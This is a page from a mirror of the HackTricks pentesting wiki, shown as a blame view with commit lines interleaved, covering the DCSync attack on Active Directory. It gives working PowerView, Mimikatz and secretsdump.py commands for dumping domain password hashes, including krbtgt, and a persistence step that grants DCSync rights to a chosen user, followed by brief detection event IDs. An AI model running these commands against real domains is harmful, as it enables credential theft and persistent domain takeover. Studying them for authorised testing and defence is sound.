0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity
hacktricks/windows/active-directory-methodology/dcsync.md

93 lines
4.8 KiB
Markdown
Raw Normal View History

Ad hacktricks sponsoring
2022-04-28 18:01:33 +02:00
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 17:43:14 +02:00
# DCSync
## DCSync
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 13:21:18 +02:00
The **DCSync **permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All **and **Replicating Directory Changes In Filtered Set**.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 17:43:14 +02:00
**Important Notes about DCSync:**
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 13:21:18 +02:00
* The **DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information **using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 17:43:14 +02:00
* By default only **Domain Admins, Enterprise Admins, Administrators, and Domain Controllers** groups have the required privileges.
* If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text
### Enumeration
Check who has these permissions using `powerview`:
```bash
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
```
Update dcsync.md
2021-10-08 08:05:56 +02:00
### Exploit Locally
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 17:43:14 +02:00
```bash
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```
Update dcsync.md
2021-10-08 08:05:56 +02:00
### Exploit Remotely
```bash
secretsdump.py -just-dc <user>:<password>@<ipaddress>
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 17:43:14 +02:00
### Persistence
If you are a domain admin, you can grant this permissions to any user with the help of `powerview`:
```bash
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
```
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 13:21:18 +02:00
Then, you can** check if the user was correctly assigned** the 3 privileges looking for them in the output of (you should be able to see the names of the privileges inside the "ObjectType" field):
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 17:43:14 +02:00
```bash
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
```
### Mitigation
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 13:21:18 +02:00
* Security Event ID 4662 (Audit Policy for object must be enabled) An operation was performed on an object
* Security Event ID 5136 (Audit Policy for object must be enabled) A directory service object was modified
* Security Event ID 4670 (Audit Policy for object must be enabled) Permissions on an object were changed
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 17:43:14 +02:00
* AD ACL Scanner - Create and compare create reports of ACLs. [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
Merge branch 'master' into master
2021-10-20 10:49:37 +02:00
[**More information about DCSync in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
[**More information about DCSync**](https://yojimbosecurity.ninja/dcsync/)
Ad hacktricks sponsoring
2022-04-28 18:01:33 +02:00
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>